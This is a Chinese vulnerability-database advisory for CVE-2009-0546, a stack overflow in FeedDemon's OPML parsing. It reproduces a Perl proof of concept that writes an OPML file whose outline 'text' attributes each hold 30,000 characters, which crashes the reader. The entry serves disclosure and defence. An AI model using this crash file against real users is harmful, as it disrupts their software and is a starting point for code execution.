Newsgator FeedDemon outline标签栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117357 漏洞类型 缓冲区溢出
发布时间 2009-02-05 更新时间 2009-02-13
CVE编号 CVE-2009-0546 CNNVD-ID CNNVD-200902-290
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7995
https://cxsecurity.com/issue/WLB-2009020177
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-290
|漏洞详情
FeedDemon是流行的WindowsRSS阅读器,允许用户在桌面上查看和管理RSS源。FeedDemon没有正确地处理大纲处理标记语言(OPML)文件。如果用户导入的OPML文件的outline标签包含有超长的text属性的话,FeedDemon在解析该文件时就会触发栈溢出,导致拒绝服务或执行任意代码。
|漏洞EXP
#!usr/bin/perl -w

################################################################################
#     Reference:
#        http://security.bkis.vn/?p=329
#        http://www.securityfocus.com/bid/33630/info
#
#    Tested on Windows Server 2003 with FeedMon 2.7.0.0. FeedMon crashes
#    whenever I am trying to Unsubscribe from the malicious(overlylong) feed.
#
#     Thanx to milw0rm, str0ke, security.bkis, @rp m@n, evilfingers
#    and all security researchers.
#
#$$$$$ This was strictly written for educational purpose. Use it at
#$$$$$ your own risk. Author will not bare any responsibility for any
#$$$$$ damages watsoever.
#
#####MOST OF THE CODE I GOT FROM###############################################
#####http://search.cpan.org/~madghoul/XML-OPML-0.26/OPML.pm####################
#
#    Author: Praveen Dar$hanam
#    Visit:
#        http://www.darshanams.blogspot.com/
#        http://www.evilfingers.com/
################################################################################

use XML::OPML;
print "OPML is working fine\n\n";

 my $opml = new XML::OPML(version => "1.1");

 $opml->head(
             title => 'FeedDemon \'outline\' Tag Buffer Overflow Vulnerability PoC',
             dateCreated => 'Thur, 05 Feb 2009 8.55:35:00 IST',
             ownerName => 'Praveen Darshanam',
             ownerEmail => 'praveen_recker@sify.com',
             expansionState => '',
             vertScrollState => '',
             windowTop => '',
             windowLeft => '',
             windowBottom => '',
             windowRight => '',
           );

 $buff="D" x 30000;
 # Malicious buffer which creates overly long text tag

 $opml->add_outline(
                 description => 'Warren Ellis\' Personal Weblog',
                 title => 'Warren Ellis Speaks Clever',
                 text => $buff,
                 type => 'rss',
                 version => 'RSS',
                 htmlUrl => 'http://www.diepunyhumans.com ',
                 xmlUrl => 'http://www.diepunyhumans.com/index.rdf ',
               );

 $opml->add_outline(
                 descriptions => 'The raelity bytes weblog.',
                 title => 'raelity bytes',
                 text => $buff,
                 type => 'rss',
                 version => 'RSS',
                 htmlUrl => 'http://www.raelity.org ',
                 xmlUrl => 'http://www.raelity.org/index.rss10 ',
               );

 $opml->save('malicious_files.opml');

# milw0rm.com [2009-02-05]
|参考资料

来源:BID
名称:33630
链接:http://www.securityfocus.com/bid/33630
来源:BUGTRAQ
名称:20090205[SVRT-02-09]FeedDemon(ver<=2.7)BufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/500686/100/0/threaded
来源:MILW0RM
名称:8010
链接:http://www.milw0rm.com/exploits/8010
来源:MILW0RM
名称:7995
链接:http://www.milw0rm.com/exploits/7995
来源:MISC
链接:http://security.bkis.vn/?p=329
来源:SECUNIA
名称:33718
链接:http://secunia.com/advisories/33718
来源:OSVDB
名称:51753
链接:http://osvdb.org/51753